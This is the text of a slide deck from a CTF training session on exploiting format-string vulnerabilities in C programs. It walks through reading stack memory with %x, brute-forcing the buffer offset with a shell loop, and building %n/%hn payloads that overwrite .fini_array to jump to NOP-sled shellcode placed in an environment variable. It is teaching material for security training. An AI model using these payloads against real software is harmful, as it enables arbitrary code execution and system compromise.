Exploiting format string in 15’’ CTF training session Julien Bachmann / @milkmix_ 

intro | source? Coming from variadic functions va_arg printf Missing format string When user can specify is format string 

intro | consequence? Two possibilities display process memory modify process memory :) 

intro | man 3 printf printf(“hex value: %x”, 42); int i; printf(“number of bytes so far%n”, &i); printf(“%2$s %1$s\n”, “world”, “Hello”); 

read | detail printf(buf); printf(“%x”); 0x42424242 0x41414141 buf @ret %ebp local 

read | detail printf(buf); printf(“%2$x”); 0x42424242 0x41414141 buf @ret %ebp local 

read | find our buffer It is in the stack need to find the virtual argument to printf brute force it! possibly need to add [1-3] padding bytes to align on 4 bytes 

read | our target 

read | find our buffer for offset in `seq 0 20`; do echo "offset=$offset"; ./strfmt "AAAA%$offset\$x"; echo; done | grep 4141 -B1 

write | specific address Put it in our buffer Use %n to write intead of %x to read Check the system endianness 

write | specific address ./strfmt `python -c 'print "B\x42\x42\x42\x42%6$n"'` 

write | specific address 

write | specific address What to overwrite? interesting variable GOT .dtor .fini_array checksec to validate writable zones 

write | specific address 

write | specific address How to write Endianness again ;) Not possible to write 0xffffdee8 (shellcode address in environment) in one pass Split in two 0xdee8 0xffff - 0xdee8 Use %hn to write only a word and not rewrite first part 

write | specific address EGG=`python -c 'print "\x90"*100+""'` ./strfmt `python -c 'print "B \x68\x96\x04\x08\x6a\x96\x04\x08%57055c%6$hn%8471c%7$hn"'` @<.fini_array> @<.fini_array> + 2 0xdee8 - 9 0xffff - 0xdee8 

auto | libformatstr From hellman Brute force and format automatic generation :)